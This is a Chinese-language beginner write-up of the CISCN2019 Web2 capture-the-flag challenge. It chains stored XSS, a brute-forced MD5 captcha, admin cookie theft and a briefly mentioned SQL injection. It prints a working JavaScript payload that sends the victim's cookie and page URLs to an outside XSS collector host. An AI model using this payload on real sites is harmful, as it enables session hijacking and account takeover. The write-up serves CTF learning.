当前位置: 代码迷 >> 综合 >> [CISCN2019 华东北赛区]Web2 WriteUp
  详细解决方案

[CISCN2019 华东北赛区]Web2 WriteUp

热度:91   发布时间:2024-02-27 09:31:17.0

[CISCN2019 华东北赛区]Web2 WriteUp

  • 前言
  • 一.打开环境
  • 二.构造XSS代码

前言

这是一道xss结合sql注入的题目,当时在写的时候想了很久,最后看大佬的题解觉得不太适合我这样的新手来看,于是心血来潮想写一篇小白向的WriteUp。

一.打开环境

在这里插入图片描述
在这里插入图片描述
发现是一个网站,有投稿和反馈功能。这个比较重要。
我们很容易想到,可以投稿,然后点击审核,管理员就会来到我们的页面,审核我们的投稿
这样的话我们可以构造恶意代码,让管理员进去,从而窃取管理员的cookie,进入后台。
打开投稿和反馈界面,随意注册一下登录:
在这里插入图片描述
在这里插入图片描述
确定是xss。

二.构造XSS代码

构造所需要的xss代码并不需要我们自己去写。
只需要登录一下http://xss.buuoj.cn/
然后注册登录,创建一个项目就好:
在这里插入图片描述
在这里插入图片描述
自己可以研究一下那一摞代码都是干嘛的,我们这里并不需要明白。
复制以下代码
(function(){(new Image()).src=‘http://xss.buuoj.cn/index.php?do=api&id=T6A1kl&location=’+escape((function() {try{return document.location.href}catch(e){return ‘’}})())+’&toplocation=’+escape((function(){try{return top.location.href}catch(e){return ‘’}})())+’&cookie=’+escape((function(){try{return document.cookie}catch(e){return ‘’}})())+’&opener=’+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:’’}catch(e){return ‘’}})());})()
注意id一定要是你项目生成的id

然后把”(new Image()).src“改成“window.location.href”
再利用脚本:
在这里插入图片描述
进行转码绕过保护。
复制payload_final,
传递到投稿界面。
在这里插入图片描述
在这里插入图片描述查看页面源代码

在这里插入图片描述
复制如图的网址,打开反馈界面粘贴,在前面加上
http://web。
在这里插入图片描述
接下来需要考虑验证码,这里涉及到哈希碰撞和生日攻击。简单来说就是暴力破解;脚本如图所示:
在这里插入图片描述
在md5[0:6]后面加上你的页面所显示的6位字符
运行等待。
在这里插入图片描述
填入。
在这里插入图片描述接下来我们去自己创建的xss项目里看。
在这里插入图片描述

在这里插入图片描述

复制cookie,利用火狐的插件修改自己的cookie
很容易找到后台网址后面加上admin.php
在这里插入图片描述没有管理cookie的情况下是这样的
在这里插入图片描述

有了管理员权限后是这样的
好,我们已经成功进入后台,出现了一个查询框

在这里插入图片描述

slq注入。

在这里插入图片描述

结束。

  相关解决方案